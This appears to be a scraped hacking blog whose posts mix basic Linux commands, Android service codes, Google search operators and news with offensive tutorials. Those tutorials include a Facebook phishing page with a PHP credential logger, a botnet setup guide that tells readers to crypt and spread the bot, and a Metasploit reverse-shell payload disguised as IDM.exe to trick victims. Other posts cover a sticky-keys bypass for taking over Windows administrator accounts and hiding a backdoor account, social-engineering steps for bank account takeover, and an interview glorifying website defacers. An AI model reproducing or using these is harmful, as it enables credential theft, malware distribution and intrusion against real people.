Basic commands of Backtrack

Basic commands of Backtrack

                                                                              
                                                                              Click to enlarge image

Know about your System

uname            Print System Information

who               Show Who Is Logged On 

cal                 Displays Calculator

date               Print System Date And Time

df                   Report File System Disk Space Usage

du                  Estimate File Space Usage 

ps                  Displays Information Of Current Active Processes

kill                 Allows To Kills Process

clear              Clear The Terminal Screen 

cat /proc/cpuinfo      Cpuinfo Display CPU Information 

cat /proc/meminfo    Display Memory Information 

File operator

pwd              Print Name Of Current/Working Directory 

cd                 Changing The Working Directory 

cp                 Copy Files Or Directory 

rm                 Remove Files And Directory 

ls                   List Of Directory Contents 

mkdir             Make Directory 

cat                 Concatenate Files And Print On Standard Output mv                 Move Files 

chmod           Change Files Permissions

                       

Network

ifconfig          To Config Network Interface

ping               Check The Other System Are Reachable From The Host System

wget              Download Files From Network

ssh                Remote Login Program

ftp                 Download/Upload Files From/To Remote System

last                Displays List Of Last Logged In User

telnet             Used To Communicate With Another Host Using THe Telnet Protocol

                       

Compression

tar                To Store And Extract Files From An Archive File Known As Tar File

gzip              Compress Or Decompress Named Files

                       

Searching Files

grep              Search Files(s) For Specific Text

find               Search For Files In A Directory Hierarchy

locate            Find Files By Name

                       

Read More

Hack facebook account with phishing

Hack facebook account with phishing attack

Hello friends, i have received so many messages about how to hack facebook from so many readers. So today i am posting Phishing Attack method by which you can directly get the password of your friends/victim.

Caution: This tutorial is only for educational purpose . Author/owner of this blog will not be responsible for what you do with this tutorial method.

Step 1.        firstly go to www.facebook.com and then press                          Ctrl+U . A new window will be opened and then                      select all codes and paste it into your text editor                        like Notepad and search "action=" {without                              quotation} you will see next to it                                               "https://www.facebook.com/login.php?                                       login_attempt=1" this link will be written and                           now replace it with "error.php" {without                                 quotation}  and save it as    login.html 

                                         It will look like this image

                                                                                  Click to enlarge image

Step 2.          Now  again open your notepad

                     Copy these codes {php script} and paste it into                          notepad

                      <?php

//www.facebook.com header("Location: http://www.facebook.com");

$handle = fopen("logs.html", "a");

foreach($_POST as $variable => $value)

{

fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fwrite($handle, "<hr />");

fclose($handle);

echo "error connection disconnected ! </br> Check your Internet Connection";

exit;

?>

                 

                   save it as   error.php

Step 3.   Now you have two files 1. login .html  and 2.                            error.php  . So you have to host these files at any free              hosting website . I personally prefer                                          www.000webshost.com  for free hosting  beacause its              easy to use. so make your account on it and host both              files on same directory . After it all you get a link like                www.hacker.000webhost.com/login.html .. so                            whenever your victim/friends go to this link and sign                in they will get an error message and you will get their              password and username in a logs.html file in same                    directory at your hosting site account.

Your victim will get a error page like this image.........
                 

That's how you will get the pass and username of victim....
                         




If our tutorial little help you then please share it and hit a like .
Still if you have any query or problem then comment here.............

              

Read More

Download Window 8.1 preview for free from Microsoft

Download Window 8.1 preview for free from Microsoft 

Microsoft has announce a free update to your window 8 which will be launched later this year till its preview version has been officially released and it can be download from here

  

Windows 8 has been a rather polarizing release, but the consensus seems to be that Microsoft has brought through some favorable changes with Windows 8.1. The Start screen, for example, caused quite a bit of controversy with long-time users, offering a bunch of tiles as opposed to the usual PC menu to which users had become so accustomed to. The confusion caused translated into slower adoption rates by the masses, and although the numbers shifted were comparable to that of Windows 7, one would expect improvements, with more users jumping on such a big statement of change, rather than the plateau that was.

Still, the software maker seems to be coping pretty well, and Windows 8.1 is a testament to that. Moreover, the Windows Store appears to be gaining traction at just the right time. As the company’s CEO, Steve Ballmer, noted yesterday during the first day of the BUILD developer conference: ‘‘Within this month we’ll pass the 100,000 app mark in the Windows Store," and although the lack of apps therein has been pointed out as a major flaw in the Windows 8 platform, things now look to be taking shape.                              

For more on whats new, download guidelines (pdf file)
                                                   

Read More

Exclusive Interview of PCE (Pak Cyber Eaglez) with hack4friends team

Exclusive Interview of PCE (Pak Cyber Eaglez) with hack4friends team 

(1) when, where and how was PCE set up?

PCE was set up 3 months ago . PCE is the underground team Pakistani hackers, we the P@KhTuN~72 | Mast3r M!nd | Sizzling Soul | SP@Rk | Code Crack3r | 3v!L
are the good friends since 2 years so we thought to launch that time,basically it was set up to show the world the Reality of Pakistani's.

(B) what is the membership strength?

(C) what is the goal of the group?

Simple Goal of group to tell the world that Who We Are? as you may be aware that the image of Pakistan over the world
is not so good so we are trying to tell the reality to explain our dignity and to also give the strong answers to anti Pakistan Countries.

(D) how easily were you able to hack the Nigerian websites?

well, it was not so easy to broke into these sites, but still the server and hosting was not se secured.

(E) In terms of website security, what's the weaknesses in the four Nigerian websites?

sites were secure enough. but the admin panel and the hosting plus the server was not so secured.

(F) What do you plan to achieve with hacking government sites?

well we always tried to hit the government sites and the famous sites so we can easily convey Our message..especially to the governments of the whole world.

(G) I've seen several movies that depict hackers in different positive and negative sides. In your own view, is hacking a positive thing?

yep sure why not it is a positive thing for security testing. like if you email some admin about the loop holes of the site they just don't give damn ear to your message.but when you hack the site it really stimulate them.

(H) Facebook was recently hacked by a professional hacker who notified the company, and the bug was fixed. This shows hackers are needed in fostering web security. But just yesterday, websites of media houses and banks in South Korea were brought than by hackers to be from North Korea. What do you think hackers and governments can do to ensure that hacking is used positively?

yep look the bug was notified to the hackers and they took the positive action but what will you do if they admins dont give any importance to your message so the one and strong way is to just change the index of that site.

(I) What are your most notable targets?

i hit alot of sites i don;t remember to be honest,, but to hack every government site is really something for me.

(J) What are your next targets?

well, next target is not so sure, but some of the countries are messing with Pakistan so we are working on them...

(K) Do you make a living from hacking?

No...

(L) Briefly enlighten our readers on how to make their websites secure.

Nothing is secure in Cyber World.. even google & facebook... Th Way Strong Passwords mean Special Characters can safe your password 50% But Security Is Nothing On Dedicated Servers.

Caution: Neither these hackers have any type of relation with us nor we have with them and these all interviews are only informative in nature.

Such interviews are conducted on anonymous relay chat and this interview was with chief hacker of PCE .

Read More

Facebook Says Technical Flaw Exposed 6 Million Users

Facebook has inadvertently exposed six million users’ phone numbers and e-mail addresses to unauthorized viewers over the last year, the company said

Facebook blamed the data leaks, which began in 2012, on a technical flaw in its huge archive of contact information collected from its 1.1 billion users worldwide. As a result of the problem, Facebook users who downloaded contact data for their list of friends obtained additional information that they were not supposed to have.

Facebook’s security team was alerted to the problem last week and fixed it within 24 hours. But Facebook did not publicly acknowledge the flaw until Friday afternoon, when it published a message on its blog explaining the situation.

A Facebook spokesman said the delay was because of a company procedure stipulating that regulators and affected users be notified before making a public announcement.

“We currently have no evidence that this bug has been exploited maliciously, and we have not received complaints from users or seen anomalous behavior on the tool or site to suggest wrongdoing,” Facebook said on its blog.

While the privacy breach was limited, “It’s still something we’re upset and embarrassed by, and we’ll work doubly hard to make sure nothing like this happens again,” it added.

The breach follows recent disclosures that several consumer Internet companies, including Facebook, Google, Microsoft, Apple and Yahoo, turned over troves of user data to a large-scale electronic surveillance program run by American intelligence officials.

The companies, led by Facebook, successfully negotiated with the United States government last week to reveal the approximate number of user information requests that each company had received, including secret national security orders.

A version of this article appeared in print on June 22, 2013, on page B4 of the New York edition with the headline: Facebook Says Technical Flaw Exposed 6 Million Users.

Read More

Secret Codes of Android mobile phones

Secret Codes of Android mobile phones :

           

Caution: Use all these codes at your own risk if you got any type of damage we will not be responsible for that.
General Codes of Android mobile phone.....

*#06# – Display's IMEI number.

*2767*3855# – This code will Format your device to factory state (will delete everything on phone).

*#*#4636#*#* – Display's Phone information, usage statistics and battery.

*#*#273282*255*663282*#*#* – This code will Immediately backup of all media files.

*#*#197328640#*#* – This code will Enable test mode for service.

*#*#1111#*#* – Will display FTA software version.

*#*#1234#*#* – Will show PDA and firmware version.

*#*#232339#*#* – Wireless LAN tests.

*#*#0842#*#* – This code is used  for Backlight/vibration test.

*#12580*369# – Display's Software and hardware info.

*#*#2664#*#* – This code is used for Testing the touchscreen.

*#9900# – System dump mode.

*#9090# – Diagnostic configuration.

*#*#34971539#*#* – Will display Detailed camera information.

*#872564# – USB logging control.

*#301279# – HSDPA/HSUPA Control Menu.

*#7465625# – This code will display phone's lock status.

*#0*# – Enter the service menu on newer phones like Galaxy S III.

*#*#7780#*#* – Reset the /data partition to factory state.


Basic Codes:


*#*#7780#*#*   - This code is used for factory restore setting.This will remove Google account setting and System and application data and settings.

*2767*3855#   -  This code is used for factory format, and will remove all files and settings including the internal memory storage. It will also re install the firmware.

*#*#4636#*#*   - This code show information about your phone and battery.

*#*#273283*255*663282*#*#*    - This code opens a File copy screen where you can backup your media files e.g. Images, Sound, Video and Voice memo.

*#*#197328640#*#*    -  This code can be used to enter into Service mode. You can run various tests and change settings in the service mode.

*#*#7594#*#*   -  This code enable your "End call / Power" button into direct power off button without asking for selecting any option(silent mode, aero plane and power-off).

*#*#8255#*#*  -  This code can be used to launch G Talk Service Monitor.

*#*#34971539#*#*    -  This code is used to get camera information. Please avoid update camera firmware option.

W-LAN, GPS and Bluetooth Test Codes:

*#*#232339#*#* OR *#*#526#*#* OR *#*#528#*#*   -  W-LAN test (Use “Menu” button to start various tests).

*#*#232338#*#*    -  Shows WiFi MAC address.

*#*#1472365#*#*    -  GPS test.

*#*#1575#*#*    -  Another GPS test.

*#*#232331#*#*   -  Bluetooth test.

*#*#232337#*#    -  Shows Bluetooth device address.

Codes to launch various Factory Tests:

*#*#0842#*#*   - Device test (Vibration test and BackLight test).

*#*#0588#*#*    - Proximity sensor test.

*#*#0*#*#*    -  LCD test.

*#*#2664#*#*   -  Touch screen test.

*#*#2663#*#*    -  Touch screen version.

*#*#0283#*#*   -  Packet Loopback.

*#*#0673#*#* OR *#*#0289#*#*    -  Melody test.

*#*#3264#*#*    -  RAM version.

Code for firmware version information:

 *#*#1111#*#*   -  FTA SW Version.

*#*#2222#*#*   - FTA HW Version.

*#*#44336#*#* - PDA, Phone, CSC, Build Time, Changelist number.

*#*#4986*2650468#*#*   - PDA, Phone, H/W, RFCallDate.

*#*#1234#*#*  - PDA and Phone.

Read More

Google Hacking and Google Dorks

Google Hacking and Google Dorks

      

The Google Hacking Database (GHDB) is an authoritative source for querying the ever-widening reach of the Google search engine. In the GHDB, you will find search terms for files containing usernames, vulnerable servers, and even files containing passwords. When The Google Hacking Database was integrated in The Exploit Database, the various google dorks contained in the thousands of exploit entries were entered into the GHDB. The direct mapping allows penetration testers to more rapidly determine if a particular web application has a publicly available exploit.


Google Dorks::

cache:
If you include other words in the query, Google will highlight those words within the cached document. For instance, [cache:www.google.com web] will show the cached content with the word “web” highlighted. This functionality is also accessible by clicking on the “Cached” link on Google’s main results page. The query [cache:] will show the version of the web page that Google has in its cache. For instance, [cache:www.google.com] will show Google’s cache of the Google homepage. Note there can be no space between the “cache:” and the web page url.

link:
The query [link:] will list webpages that have links to the specified webpage. For instance, [link:www.google.com] will list webpages that have links pointing to the Google homepage. Note there can be no space between the “link:” and the web page url.

related:
The query [related:] will list web pages that are “similar” to a specified web page. For instance, [related:www.google.com] will list web pages that are similar to the Google homepage. Note there can be no space between the “related:” and the web page url.

info:
The query [info:] will present some information that Google has about that web page. For instance, [info:www.google.com] will show information about the Google homepage. Note there can be no space between the “info:” and the web page url.

define:
The query [define:] will provide a definition of the words you enter after it, gathered from various online sources. The definition will be for the entire phrase entered (i.e., it will include all the words in the exact order you typed them).

stocks:
If you begin a query with the [stocks:] operator, Google will treat the rest of the query terms as stock ticker symbols, and will link to a page showing stock information for those symbols. For instance, [stocks: intc yhoo] will show information about Intel and Yahoo. (Note you must type the ticker symbols, not the company name.)

site:
If you include [site:] in your query, Google will restrict the results to those websites in the given domain. For instance, [help site:www.google.com] will find pages about help within www.google.com. [help site:com] will find pages about help within .com urls. Note there can be no space between the “site:” and the domain.

allintitle:
If you start a query with [allintitle:], Google will restrict the results to those with all of the query words in the title. For instance, [allintitle: google search] will return only documents that have both “google” and “search” in the title.

intitle:
If you include [intitle:] in your query, Google will restrict the results to documents containing that word in the title. For instance, [intitle:google search] will return documents that mention the word “google” in their title, and mention the word “search” anywhere in the document (title or no). Note there can be no space between the “intitle:” and the following word.
Putting [intitle:] in front of every word in your query is equivalent to putting [allintitle:] at the front of your query: [intitle:google intitle:search] is the same as [allintitle: google search].

allinurl:
If you start a query with [allinurl:], Google will restrict the results to those with all of the query words in the url. For instance, [allinurl: google search] will return only documents that have both “google” and “search” in the url.
Note that [allinurl:] works on words, not url components. In particular, it ignores punctuation. Thus, [allinurl: foo/bar] will restrict the results to page with the words “foo” and “bar” in the url, but won’t require that they be separated by a slash within that url, that they be adjacent, or that they be in that particular word order. There is currently no way to enforce these constraints.

inurl:
If you include [inurl:] in your query, Google will restrict the results to documents containing that word in the url. For instance, [inurl:google search] will return documents that mention the word “google” in their url, and mention the word “search” anywhere in the document (url or no). Note there can be no space between the “inurl:” and the following word.

Putting “inurl:” in front of every word in your query is equivalent to putting “allinurl:” at the front of your query: [inurl:google inurl:search] is the same as [allinurl: google search].

 I m also uploading txt file which contains almost google dorks... so keep visiting our blog..

Read More

How to beccome a BEST HACKER

How to beccome a BEST HACKER

1. Learn TCP/IP, Basic Information gathering, Proxies, Socks, SSL, VPN, VPS, RDP, FTP, POP3, SMTP, Telnet, SSH.
2. Learn Linux, Unix, Windows - You can do this using vmware or any virtual desktop utility.
3. Learn a programming language that's compatible with all OS - Perl, Python, C, ASM
4. Learn HTML, PHP, Javascript, ASP, XML, SQL, XSS, SQLI, RFI, LFI
5. Learn Reverse engineering and crack some programs for serials easy ones like mirc, winzip, winrar or old games.
6. Code a fuzzer for common protocols - ftp, pop3, 80, 8080 - Pick some free software like ftp server, mail server, apache or iis webserver or a webserver all-in-one pack, or teamspeak, ventrilo, mumble.
7. Code a tool that uses grep to sort out unique code in source codes.
8. Make a custom IPtable, IPsec firewall that blocks all incoming traffic and out going traffic and add filters to accept certain ports that your software or scripts use.
9. Pick a kernel in linux or unix, also pick a Microsoft OS version lets say Winxp pro sp2 put them on the virtual desktops (vmware) and find and code a new local exploit in those versions, then install a Apache webserver on the Linux/Unix and a IIS webserver on the winxp pro and attempt to find and code a new local reverse_tcp_shell exploit.
10. Learn Cisco Router and Switch configuration and setup.
11. Learn Checkpoint Setup and Config
12. Learn Wifi scanning, cracking, sniffing.
13. Pick a person in you phonebook for the area code you live in or city then ring the person on a anonymous line like skype or a payphone or a carded sim and attempt to social engineer the person for his name, address, data of birth, city born, country born, ISP connected with, Phone company connected with, What bank he/she uses and anything else you can get. Then Attempt to ring using a spoof caller ID software with the person's phone number - call the ISP and try reset the password to his/her internet connection/web-mail, get access to bank account or ask them to send out a new *** to a new address (drop) with a new pin, reset of phone company passwords.
14. Use your information gathering skills to get all the information off a website like a shop then use the spoof caller-id software or hack your phone to show a new number of the Webserver's Tech Support number then ring the shop owner and try get the shop site password.
15. Do the same thing but attempt to use a web attack against a site or shop to gain admin access.
16. Once got access upload a shell and attempt to exploit the server to gain root using a exploit you coded not someone else s exploit.
17. Make your own Linux Distro
18. Use your own Linux Distro or use a vanilla Linux gnome (not kde) keep it with not much graphics so you can learn how to depend on the terminal and start from scratch install applications that you will only need for a blackbox (Security test box), make folders for fuzzers, exploits, scanners..etc Then load them up with your own scripts and other tools ( By this stage you shouldn't need to depend on other peoples scripts).
19. Learn macosx and attempt to gain access to a Macosx box whether it be your own or someone's else.
20. Create a secure home network and secure your own systems with your own Security policies and firewall settings.



All this isn't a over night learning it will take a nice 3 - 4 years to learn a bit of this 5+ years to learn most of it and even then you may need time to keep learn as IT keeps changing ever day.

As long as your dedicated to learning you won't have any problems and if you learn all that you should easy get a job in any company if you show proof that you can do these things (print out scripts that you made or put on disc) to show the companies.

Enjoy Hacking ( - | -)
                           

Read More

Use facebook without internet connection

Use Facebook  without internet Connection

I know some of you are thinking that i am mad or whatsoever. But friends it real now you can use facebook without internet via your mobile phone whatever its model/platform .Even which mobile phones don't support internet you can also use them to access facebook.

Infact Facebook India has partnered with Fonetwish to bring Facebook on every mobile phone without requiring any apps or even the Internet.Now you can able to use facebook on cell phones like 1100.

The one thing you only to do is Just dial *325# from your mobile phone.

Now you have to follow some instruction ..

## After dialing this number it will ask you facebook username and password. now enter your user name and password by your keypad.

## now you get in and you will see a menu like this..........

     1. news feed

     2. update status
     3. post on wall.
     4. friend request.
     5. messages.
     6. notifications.

     * Account setting

Note:: This service of facebook is only available in INDIA..

This Service Currently available On selected operators            like Airtel, Aircel, Idea, Vodafone and Tata Docomo users.

Access to facebook account and Status updates is completely free.If you also want to use features like Notifications, updating friends wall you have to subscribe to Fonetwish premium plan which is very cheap.



                    WE NEED YOUR SUPPORT GUYS

One thing i wanna request to our all readers  please share our posts or our blog link to your friends an also be the member of our blog.

And if you little like our posts then please like them , for any query comment here...

Read More

How to setup a botnet

How to setup a botnet

Caution:: This tutorial is only for educational purpose so that you can also know how a malicious hacker can make you a part of his botnet. I'm not responsible for how you use this tutorial.

                      This is a self explanatory image of botnet                 

                                           Click to enlarge image

What is botnet :   A Botnet is a Panel that can keep many Computers connected to it. The Computers connected to it is called Bots.The bots will be under your Command so you will be able to command them to do things and they will do it. In this tutorial I will teach you how to setup a Botnet. Before doing anything Download the Botnet File’s. 


                                  

Password :: hack4friends.blogspot.com

Necessary Task-- You have to create a account on free hosting websites. I will recommend you for  www.000webhost.com

Step 1.  Extract the Botnet Files and then open up the Folder “Panel”. Find Config.Php and Edit it with any writing Program.

Step 2.  Now go to your Webhost and add SQL DB and User. When you are done with that upload the .sql to your sql DB from the Folder “SQL”.

Step 3. Upload everything in the Folder “Panel” to your Webhost. Now close the folder etc.

Step 4. Go to the Website you used to upload. Login to your Botnet with the password in Config.Php Congratulations! You got your own Botnet...

Step 5. Go back to the Folder “Botnet” and open up Build.exe. Then type in Your Domain Name and the Path. Build the File, Crypt & Spread..... via messanger fb chat ,forums ,etc

Guys its very easy still i will upload also a video which will help you more about how to do it.

Read More

Read More

How to hack windows 7 by backtrack

Now just log on your mind and read this tutorial carefully 

1. Open the terminal of the Backtrack

                                               
                                                   Click to enlarge the image

2. Write the following command "msfpayload windows/meterpreter/reverse_tcp lhost=backtrack IP address lport=4444  x  >  /root/Desktop/IDM.exe"

                                                         

                                                        Click to enlarge the image

 AND WAIT FOR A MINUTE...

After the Successful completion of your IDM.exe 

3. Again Open another terminal and write 'msfconsole' 

4. Then write the command -- "use exploit/multi/handler" and press enter.

5. Then you have to set a payload by writing the command -- "set payload windows/vncinject/reverse_tcp"

6. Then Set the LHOST (LOCAL HOST) -- "set lhost 192.168.40.128 (Backtrack IP address)

7. Then Just set for the exploit -- "exploit"

Now as soon as The VICTIM download your IDM file from the INTERNET 

 and tried to install 

Now you have full access of victim computer's access

Read More

Hack Windows Administrator passwords Using Stick keys

Ever wanted to hack administrator account in college/school Pcs . so that you can download with full speed or just wanted to hack your friend’s PC to make him gawk when you tell your success story of hacking ? well there's a great way of hacking window administartor password which works 100 % even today......  interested ? read on ......

Concept Used 

When we Press Shift key 5 times a sticky key dialog box shows up.This works even at the logon screen. But If we replace the sethc file  which is responsible for the sticky key dialog box ,with cmd. (command prompt ), and then  press shift key 5 times at logon screen .we will get a command prompt with administrator privileges because no user has logged on. From there we can hack the administrator password or create a new user with admin privileges

Things we Need :-

1. Bootable  Linux distro .In this tutorial i will be using backtrack  If you don't know
    how create a bootable Linux distro you can refer my previous 
    article How To Make a Bootable Backtrack CD / USBProcedure

Procedure:

1. First plug in your Bootable Linux distro CD or USB then restart your computer and 

go to boot menu by  pressing ( f12 or del key ) now select your booting device as CD/USB accordingly

2. After booting with your Linux distro open a new terminal mount the hard disk and navigate to c:/windows/system32 and copy cmd (command prompt) and rename it as sethc .

3. Now copy /past the new sethc to c:/windows/system32,when asks for overwriting the file click yes.

4. Now reboot and remove your usb/cd . Now when your in the logon screen press shift key 5 times Instead of Sticky Key confirmation dialog box ,command prompt with full administrator privileges will open.

                         
5. Now you can change the password of the administrator account or add a new user using the following commands

Example :
"Net user administrator 123 " where 123 is the password  or  you can add a new user 
"Net user  hackaholic /add "  where hackaholic is the name of the user  

     

 

6. You can also hide the  newly created account by going  to registry editor by click run and entering regedit  

Now  navigate to 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList]            Here create a new DWORD value, write its name as the “user name”     that you created for your  account
 

By  this way we are able to hack windows admin accounts successfully .

Read More